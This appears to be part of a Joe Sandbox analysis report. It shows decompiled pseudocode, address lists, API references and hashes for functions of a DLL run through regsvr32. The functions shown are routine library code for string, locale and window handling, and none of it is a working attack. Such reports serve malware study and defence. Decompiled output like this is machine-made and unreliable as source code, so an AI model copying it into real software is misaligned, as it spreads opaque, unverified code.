								E10045D9D(_t137 - 0x14, __eflags,  *(_t137 + 0xc));
								E10045CFA(_t137 - 0x14, _t137 - 0x2c);
								_t96 = lstrlenA(_t137 - 0x2c);
								 *((intOrPtr*)(_t137 - 0x18)) =  *((intOrPtr*)(_t137 - 0x18)) + _t96;
								 *(_t137 + 0xc) =  *(_t137 + 0xc) + _t96;
								_t135 = E10045D4E(_t137 - 0x14, _t137,  *((intOrPtr*)(_t137 - 0x18))) +  *(_t137 + 0xc);
								__eflags = _t135;
								_t130 = E1001B7D0(E1001B7D0(_t130));
							}
						}
						 *(_t137 + 0xc) =  *(_t137 + 0xc) + 1;
						 *_t135 =  *_t130;
						_t130 = E1001B7D0(_t130);
						_t77 = E1001B7D0(_t135);
					}
					E10045D9D(_t137 - 0x14, __eflags,  *(_t137 + 0xc));
					E1001D3F2(E10045DC5(_t137 - 0x10, 0x80),  *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x10)) - 8)),  *((intOrPtr*)(_t137 - 0x14)), _t137 - 0x50);
					E10045D9D(_t137 - 0x10, __eflags, 0xffffffff);
					E10045693( *((intOrPtr*)(_t137 + 8)), _t137 - 0x10);
					 *(_t137 - 0x1c) = 1;
					 *(_t137 - 4) = 1;
					E1004591E(_t137 - 0x14);
					 *(_t137 - 4) =  *(_t137 - 4) & 0x00000000;
					E1004591E(_t137 - 0x10);
					_t70 =  *((intOrPtr*)(_t137 + 8));
					goto L13;
				}
				E10045693( *((intOrPtr*)(_t137 + 8)), _t137 - 0x10);
				 *(_t137 - 0x1c) = _t133;
				goto L12;
			}

0x10019102
0x10019107
0x1001910a
0x1001910f
0x10019114
0x10019117
0x1001911a
0x1001911f
0x10019123
0x10019126
0x1001913c
0x1001913e
0x10019288
0x10019290
0x1001929c
0x100192a1
0x100192a4
0x100192a4
0x100192ab
0x100192b0
0x100192b3
0x100192b7
0x100192bf
0x100192bf
0x1001914c
0x10019154
0x10019156
0x00000000
0x00000000
0x10019162
0x10019167
0x1001916c
0x1001916f
0x10019178
0x10019178
0x10019178
0x1001917d
0x10019187
0x1001918a
0x1001918f
0x1001918f
0x10019192
0x10019194
0x00000000
0x00000000
0x1001919a
0x1001919d
0x1001919f
0x100191a3
0x100191b6
0x100191bb
0x100191c4
0x100191d0
0x100191d9
0x100191db
0x100191de
0x100191ef
0x100191ef
0x100191fe
0x10019200
0x100191a3
0x10019203
0x10019207
0x1001920f
0x10019211
0x10019217
0x10019223
0x10019244
0x10019251
0x1001925d
0x10019265
0x1001926c
0x10019270
0x10019275
0x1001927c
0x10019281
0x00000000
0x10019285
0x1001912f
0x10019134
0x00000000

APIs

__EH_prolog.LIBCMT ref: 10019102
lstrlenA.KERNEL32(?), ref: 10019181
__ftol.LIBCMT ref: 100191B0
lstrlenA.KERNEL32(?,?,00000000), ref: 100191D9
_wctomb_s.LIBCMT ref: 10019244

Part of subcall function 10045693: InterlockedIncrement.KERNEL32(?), ref: 100456A8

Part of subcall function 1004591E: InterlockedDecrement.KERNEL32(-000000F4), ref: 10045932

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Interlockedlstrlen$DecrementH_prologIncrement__ftol_wctomb_s
String ID:
API String ID: 1898162302-0
Opcode ID: 9acb8ebf9c0c3139fb25101dab6e6db51b7c19cdea47146c37cf11ac03131f4e
Instruction ID: fc2cf0a2ae589709b2af8a2d696e363e61429909a1ac3680330f7e44fd09c322
Opcode Fuzzy Hash: 9acb8ebf9c0c3139fb25101dab6e6db51b7c19cdea47146c37cf11ac03131f4e
Instruction Fuzzy Hash: 6D517D75C0021AABDF11DFE4C885AEEB7B8FF04350F204429F455AB192EB75AA44CB65

Uniqueness

Uniqueness Score: -1.00%

Function 1000F10E Relevance: 7.6, APIs: 5, Instructions: 127
windowthreadCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000F10E(void* __ecx) {
				signed int _t64;
				void* _t75;

				E1001A9E0(0x100766fc, _t75);
				_t64 =  *((intOrPtr*)(_t75 + 0xc)) + 0x2cc;
				if(_t64 > 0xf) {
					L23:
				} else {
					switch( *((intOrPtr*)(_t64 * 4 +  &M1000F2D6))) {
						case 0:
							__esi =  *(__ebp + 0x10);
							__edi = 0;
							 *__esi = 2;
							__eflags =  *0x10094b74 - __edi; // 0x1
							if(__eflags != 0) {
								L7:
								 *(__esi + 8) = 1;
							} else {
								__eax = E10065911();
								__eflags =  *(__eax + 0x20);
								if( *(__eax + 0x20) != 0) {
									goto L7;
								} else {
									 *(__esi + 8) = __di;
								}
							}
							goto L22;
						case 1:
							_t66 =  *((intOrPtr*)(_t75 + 0x10));
							 *(_t66 + 8) =  *(_t66 + 8) | 0x0000ffff;
							 *_t66 = 0xb;
							goto L22;
						case 2:
							__esi =  *(__ebp + 0x10);
							__ecx =  *(__ebp + 8);
							 *__esi = 0xb;
							E100116CC( *(__ebp + 8)) =  ~__eax;
							asm("sbb eax, eax");
							 *(__esi + 8) = __ax;
							goto L22;
						case 3:
							__eax =  *(__ebp + 0x10);
							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
							 *__eax = 0xb;
							goto L22;
						case 4:
							goto L23;
						case 5:
							__eax =  *0x1008f630;
							 *(__ebp + 0xc) =  *0x1008f630;
							__ecx = __ebp + 0xc;
							 *(__ebp - 4) = 1;
							__eax = E100478EF(__ebp + 0xc, __eflags, 0xf1c0);
							__esi =  *(__ebp + 0x10);
							__ecx = __ebp + 0xc;
							 *__esi = 8;
							__eax = L1007204E();
							_t57 = __ebp - 4;
							 *_t57 =  *(__ebp - 4) | 0xffffffff;
							__eflags =  *_t57;
							 *(__esi + 8) = __eax;
							__ecx = __ebp + 0xc;
							goto L21;
						case 6:
							__esi =  *(__ebp + 0x10);
							 *__esi = 3;
							 *(__esi + 8) = GetThreadLocale();
							goto L22;
						case 7:
							__eflags =  *(__esi + 0x3c) - 0xffffffff;
							if(__eflags == 0) {
								_push( *(__esi + 0x1c));
								__ecx = __ebp - 0x20;
								L1004F725(__ebp - 0x20, __eflags) =  *(__esi + 0x1c);
								 *( *(__esi + 0x1c) + 0x1c) = SendMessageA( *( *(__esi + 0x1c) + 0x1c), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x1c) + 0x1c));
								 *(__esi + 0x3c) = GetBkColor( *(__ebp - 0x18));
								__eax = GetTextColor( *(__ebp - 0x18));
								__ecx = __ebp - 0x20;
								 *(__esi + 0x40) = __eax;
								__eax = L1004F797(__ebp - 0x20, __eflags);
							}
							__eax =  *(__ebp + 0x10);
							__eflags = __edi - 0xfffffd43;
							 *__eax = 3;
							if(__edi != 0xfffffd43) {
								__esi =  *(__esi + 0x40);
							} else {
								__esi =  *(__esi + 0x3c);
							}
							 *(__eax + 8) = __esi;
							goto L22;
						case 8:
							__edi = 0;
							__eflags =  *(__esi + 0x44);
							if( *(__esi + 0x44) != 0) {
								L16:
								__edi =  *(__ebp + 0x10);
								 *__edi = 9;
								__eax =  *(__esi + 0x44);
								_push(__eax);
								__ecx =  *__eax;
								__eax =  *(__esi + 0x44);
								 *(__edi + 8) =  *(__esi + 0x44);
								goto L22;
							} else {
								__ecx =  *(__esi + 0x1c);
								__eax = E1000FB1F( *(__esi + 0x1c));
								__ecx = __esi;
								__eax = E1000F316(__esi, __eax);
								__eflags =  *(__esi + 0x44);
								if( *(__esi + 0x44) == 0) {
									goto L23;
								} else {
									goto L16;
								}
							}
							goto L24;
						case 9:
							__eax =  *0x1008f630;
							 *(__ebp + 8) =  *0x1008f630;
							__esi =  *(__ebp + 0x10);
							 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
							__ecx = __ebp + 8;
							 *__esi = 8;
							__eax = L1007204E();
							 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
							 *(__esi + 8) = __eax;
							__ecx = __ebp + 8;
							L21:
							__eax = E1004591E(__ecx);
							L22:
							_push(1);
							_pop(0);
							goto L24;
					}
				}
				L24:
				 *[fs:0x0] =  *((intOrPtr*)(_t75 - 0xc));
				return 0;
			}

0x1000f113
0x1000f122
0x1000f12b
0x1000f2c4
0x1000f131
0x1000f131
0x00000000
0x1000f15c
0x1000f15f
0x1000f161
0x1000f166
0x1000f16c
0x1000f181
0x1000f181
0x1000f16e
0x1000f16e
0x1000f173
0x1000f176
0x00000000
0x1000f178
0x1000f178
0x1000f178
0x1000f176
0x00000000
0x00000000
0x1000f138
0x1000f13b
0x1000f140
0x00000000
0x00000000
0x1000f22f
0x1000f232
0x1000f235
0x1000f23f
0x1000f241
0x1000f243
0x00000000
0x00000000
0x1000f14a
0x1000f14d
0x1000f152
0x00000000
0x00000000
0x00000000
0x00000000
0x1000f284
0x1000f289
0x1000f291
0x1000f294
0x1000f29b
0x1000f2a0
0x1000f2a3
0x1000f2a6
0x1000f2ab
0x1000f2b0
0x1000f2b0
0x1000f2b0
0x1000f2b4
0x1000f2b7
0x00000000
0x00000000
0x1000f249
0x1000f24c
0x1000f257
0x00000000
0x00000000
0x1000f18c
0x1000f190
0x1000f192
0x1000f195
0x1000f19d
0x1000f1ad
0x1000f1bf
0x1000f1c2
0x1000f1c8
0x1000f1cb
0x1000f1ce
0x1000f1ce
0x1000f1d3
0x1000f1d6
0x1000f1dc
0x1000f1e1
0x1000f1e8
0x1000f1e3
0x1000f1e3
0x1000f1e3
0x1000f1eb
0x00000000
0x00000000
0x1000f1f3
0x1000f1f5
0x1000f1f8
0x1000f213
0x1000f213
0x1000f216
0x1000f21b
0x1000f21e
0x1000f21f
0x1000f224
0x1000f227
0x00000000
0x1000f1fa
0x1000f1fa
0x1000f1fd
0x1000f203
0x1000f205
0x1000f20a
0x1000f20d
0x00000000
0x00000000
0x00000000
0x00000000
0x1000f20d
0x00000000
0x00000000
0x1000f25c
0x1000f261
0x1000f264
0x1000f267
0x1000f26b
0x1000f26e
0x1000f273
0x1000f278
0x1000f27c
0x1000f27f
0x1000f2ba
0x1000f2ba
0x1000f2bf
0x1000f2bf
0x1000f2c1
0x00000000
0x00000000
0x1000f131
0x1000f2c6
0x1000f2cb
0x1000f2d3

APIs

__EH_prolog.LIBCMT ref: 1000F113
SendMessageA.USER32 ref: 1000F1AD
GetBkColor.GDI32(?), ref: 1000F1B6
GetTextColor.GDI32(?), ref: 1000F1C2
GetThreadLocale.KERNEL32 ref: 1000F251

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Color$H_prologLocaleMessageSendTextThread
String ID:
API String ID: 741590120-0
Opcode ID: 13319de02a1ef2de2bb385586959f8e9ac51698bd0ece12ebf91aaae8fa9a763
Instruction ID: 1596db5e7f8d7cf2ae54d2c7c202a61906737237359ebf4c1b9721bee6e63225
Opcode Fuzzy Hash: 13319de02a1ef2de2bb385586959f8e9ac51698bd0ece12ebf91aaae8fa9a763
Instruction Fuzzy Hash: 3151A139800716DFDB20DF64C9448AEB7F1FF043A0B21851EEC569BBA1E774A941EB91

Uniqueness

Uniqueness Score: -1.00%

Function 10018CBD Relevance: 7.6, APIs: 5, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E10018CBD(char* __ecx) {
				intOrPtr _t35;
				char _t36;
				WCHAR* _t41;
				int _t43;
				intOrPtr _t68;
				char* _t72;
				void* _t74;
				void* _t76;
				char* _t77;

				_t60 = __ecx;
				E1001A9E0(0x10077e1f, _t74);
				_t77 = _t76 - 0x18;
				_t35 =  *0x1008f630; // 0x1008f644
				 *((intOrPtr*)(_t74 - 0x14)) = 0;
				 *((intOrPtr*)(_t74 - 0x10)) = _t35;
				_t36 = __ecx[8];
				_t68 = 1;
				 *((intOrPtr*)(_t74 - 4)) = _t68;
				if(_t36 != 2) {
					__eflags = _t36 - _t68;
					if(__eflags != 0) {
						E10017242(_t74 - 0x24);
						 *((char*)(_t74 - 4)) = 2;
						 *_t77 =  *__ecx;
						__imp__#114(__ecx, __ecx,  *(_t74 + 0x10),  *(_t74 + 0xc), _t74 - 0x1c);
						E1001689B(_t74, _t74 - 0x1c);
						_t41 =  *(_t74 - 0x1c);
						 *((short*)(_t74 - 0x24)) = 8;
						__eflags = _t41;
						 *(_t74 + 0x10) = _t41;
						if(_t41 != 0) {
							_t43 = lstrlenW(_t41) + _t42 + 2;
							 *(_t74 + 0xc) = _t43;
							__eflags = _t43 + 0x00000003 & 0x000000fc;
							E1001B2B0(_t43 + 0x00000003 & 0x000000fc, _t60);
							_t72 = _t77;
							 *_t72 = 0;
							WideCharToMultiByte(0, 0,  *(_t74 + 0x10), 0xffffffff, _t72,  *(_t74 + 0xc), 0, 0);
						} else {
							_t72 = 0;
						}
						E1004598C( *((intOrPtr*)(_t74 + 8)), _t74, _t72);
						 *((intOrPtr*)(_t74 - 0x14)) = _t68;
						__imp__#9(_t74 - 0x24);
					} else {
						E100478EF(_t74 - 0x10, __eflags, 0xf099);
						E10045693( *((intOrPtr*)(_t74 + 8)), _t74 - 0x10);
						 *((intOrPtr*)(_t74 - 0x14)) = _t68;
					}
				} else {
					E10045693( *((intOrPtr*)(_t74 + 8)), _t74 - 0x10);
					 *((intOrPtr*)(_t74 - 0x14)) = _t68;
				}
				 *((char*)(_t74 - 4)) = 0;
				E1004591E(_t74 - 0x10);
				 *[fs:0x0] =  *((intOrPtr*)(_t74 - 0xc));
				return  *((intOrPtr*)(_t74 + 8));
			}

0x10018cbd
0x10018cc2
0x10018cc7
0x10018cca
0x10018cd6
0x10018cd9
0x10018cdc
0x10018ce1
0x10018ce5
0x10018ce8
0x10018cfe
0x10018d00
0x10018d27
0x10018d2f
0x10018d3e
0x10018d41
0x10018d48
0x10018d4d
0x10018d50
0x10018d56
0x10018d58
0x10018d5b
0x10018d68
0x10018d6c
0x10018d72
0x10018d74
0x10018d79
0x10018d80
0x10018d8a
0x10018d5d
0x10018d5d
0x10018d5d
0x10018d94
0x10018d9c
0x10018da0
0x10018d02
0x10018d0a
0x10018d16
0x10018d1b
0x10018d1b
0x10018cea
0x10018cf1
0x10018cf6
0x10018cf6
0x10018da9
0x10018dac
0x10018dba
0x10018dc5

APIs

__EH_prolog.LIBCMT ref: 10018CC2

Part of subcall function 10045693: InterlockedIncrement.KERNEL32(?), ref: 100456A8

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prologIncrementInterlocked
String ID:
API String ID: 1487423697-0
Opcode ID: 0dc9c2b9de7846d822d35756d8a40d9e9c02fa0f5d202fbe50629204a1cf22de
Instruction ID: af28089a762ae0cc56b72bdf0cb70c55c645d9a3d8da61e9b732a9e5416d60d8
Opcode Fuzzy Hash: 0dc9c2b9de7846d822d35756d8a40d9e9c02fa0f5d202fbe50629204a1cf22de
Instruction Fuzzy Hash: B5317EB590025AEBCF11DFA4CC85CEEBBB8FF48354B20442AF954A7251D734AB44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10018037 Relevance: 7.6, APIs: 5, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E10018037(intOrPtr* __ecx) {
				intOrPtr _t36;
				intOrPtr _t37;
				WCHAR* _t42;
				int _t44;
				intOrPtr _t69;
				char* _t73;
				void* _t75;
				void* _t77;
				char* _t78;

				_t61 = __ecx;
				E1001A9E0(0x10077dc3, _t75);
				_t78 = _t77 - 0x18;
				_t36 =  *0x1008f630; // 0x1008f644
				 *((intOrPtr*)(_t75 - 0x14)) = 0;
				 *((intOrPtr*)(_t75 - 0x10)) = _t36;
				_t37 =  *((intOrPtr*)(__ecx + 8));
				_t69 = 1;
				 *((intOrPtr*)(_t75 - 4)) = _t69;
				if(_t37 != 2) {
					__eflags = _t37 - _t69;
					if(__eflags != 0) {
						E10017242(_t75 - 0x24);
						 *((char*)(_t75 - 4)) = 2;
						__imp__#113( *__ecx,  *((intOrPtr*)(__ecx + 4)),  *(_t75 + 0x10),  *(_t75 + 0xc), _t75 - 0x1c);
						E1001689B(_t75, _t75 - 0x1c);
						_t42 =  *(_t75 - 0x1c);
						 *((short*)(_t75 - 0x24)) = 8;
						__eflags = _t42;
						 *(_t75 + 0x10) = _t42;
						if(_t42 != 0) {
							_t44 = lstrlenW(_t42) + _t43 + 2;
							 *(_t75 + 0xc) = _t44;
							__eflags = _t44 + 0x00000003 & 0x000000fc;
							E1001B2B0(_t44 + 0x00000003 & 0x000000fc, _t61);
							_t73 = _t78;
							 *_t73 = 0;
							WideCharToMultiByte(0, 0,  *(_t75 + 0x10), 0xffffffff, _t73,  *(_t75 + 0xc), 0, 0);
						} else {
							_t73 = 0;
						}
						E1004598C( *((intOrPtr*)(_t75 + 8)), _t75, _t73);
						 *((intOrPtr*)(_t75 - 0x14)) = _t69;
						__imp__#9(_t75 - 0x24);
					} else {
						E100478EF(_t75 - 0x10, __eflags, 0xf098);
						E10045693( *((intOrPtr*)(_t75 + 8)), _t75 - 0x10);
						 *((intOrPtr*)(_t75 - 0x14)) = _t69;
					}
				} else {
					E10045693( *((intOrPtr*)(_t75 + 8)), _t75 - 0x10);
					 *((intOrPtr*)(_t75 - 0x14)) = _t69;
				}
				 *((char*)(_t75 - 4)) = 0;
				E1004591E(_t75 - 0x10);
				 *[fs:0x0] =  *((intOrPtr*)(_t75 - 0xc));
				return  *((intOrPtr*)(_t75 + 8));
			}

0x10018037
0x1001803c
0x10018041
0x10018044
0x10018050
0x10018053
0x10018056
0x1001805b
0x1001805f
0x10018062
0x10018078
0x1001807a
0x100180a1
0x100180a9
0x100180b9
0x100180c0
0x100180c5
0x100180c8
0x100180ce
0x100180d0
0x100180d3
0x100180e0
0x100180e4
0x100180ea
0x100180ec
0x100180f1
0x100180f8
0x10018102
0x100180d5
0x100180d5
0x100180d5
0x1001810c
0x10018114
0x10018118
0x1001807c
0x10018084
0x10018090
0x10018095
0x10018095
0x10018064
0x1001806b
0x10018070
0x10018070
0x10018121
0x10018124
0x10018132
0x1001813d

APIs

__EH_prolog.LIBCMT ref: 1001803C

Part of subcall function 10045693: InterlockedIncrement.KERNEL32(?), ref: 100456A8

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prologIncrementInterlocked
String ID:
API String ID: 1487423697-0
Opcode ID: e83306eb2b36101f233a1a6134086f850f6226938c9c439fed108226e33113d4
Instruction ID: 7ae07b4c79f3242e8f3e1c5ce7d1b437febd5ddb2ddd170428598b43a09681d4
Opcode Fuzzy Hash: e83306eb2b36101f233a1a6134086f850f6226938c9c439fed108226e33113d4
Instruction Fuzzy Hash: A931497590025AEBDB11DFA4C885CEEBBB8FF08254B10482AF915AB211D775AB49CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10044893 Relevance: 7.6, APIs: 5, Instructions: 91
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10044893(void* __ebx, intOrPtr __ecx, void* __eflags) {
				void* _t31;
				signed int _t42;
				struct HWND__* _t62;
				void* _t64;

				E1001A9E0(0x100765c0, _t64);
				 *((intOrPtr*)(_t64 - 0x10)) = __ecx;
				E10040DD2(_t64 - 0x38);
				E10041B57(_t64 - 0x74);
				 *(_t64 - 4) = 0;
				_t62 = GetTopWindow( *(__ecx + 0x1c));
				if(_t62 != 0) {
					do {
						 *(_t64 - 0x58) = _t62;
						 *(_t64 - 0x34) = GetDlgCtrlID(_t62) & 0x0000ffff;
						_push(_t62);
						 *((intOrPtr*)(_t64 - 0x24)) = _t64 - 0x74;
						if(E10041F9F() == 0 || E10040BF8(_t35, 0, 0xbd11ffff, _t64 - 0x38, 0) == 0) {
							if(E10040BF8( *((intOrPtr*)(_t64 - 0x10)),  *(_t64 - 0x34), 0xffffffff, _t64 - 0x38, 0) == 0) {
								_t46 =  *((intOrPtr*)(_t64 + 0xc));
								if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
									if((SendMessageA( *(_t64 - 0x58), 0x87, 0, 0) & 0x00000020) == 0) {
										L11:
										_t46 = 0;
									} else {
										_t42 = E100452DE(_t64 - 0x74) & 0x0000000f;
										if(_t42 == 3 || _t42 == 6 || _t42 == 7 || _t42 == 9) {
											goto L11;
										}
									}
								}
								E10040F97(_t64 - 0x38,  *((intOrPtr*)(_t64 + 8)), _t46);
							}
						}
						_t62 = GetWindow(_t62, 2);
					} while (_t62 != 0);
				}
				 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
				 *(_t64 - 0x58) = 0;
				_t31 = E10042632(_t64 - 0x74);
				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
				return _t31;
			}

0x10044898
0x100448a7
0x100448aa
0x100448b2
0x100448bc
0x100448c5
0x100448c9
0x100448d0
0x100448d1
0x100448dd
0x100448e3
0x100448e4
0x100448ee
0x1004491a
0x1004491c
0x10044921
0x10044936
0x10044957
0x10044957
0x10044938
0x10044940
0x10044946
0x00000000
0x00000000
0x10044946
0x10044936
0x10044960
0x10044960
0x1004491a
0x1004496e
0x10044970
0x10044978
0x10044979
0x10044980
0x10044983
0x1004498d
0x10044995

APIs

__EH_prolog.LIBCMT ref: 10044898
GetTopWindow.USER32(?), ref: 100448BF
GetDlgCtrlID.USER32 ref: 100448D4
SendMessageA.USER32 ref: 1004492D
GetWindow.USER32(00000000,00000002), ref: 10044968

Memory Dump Source

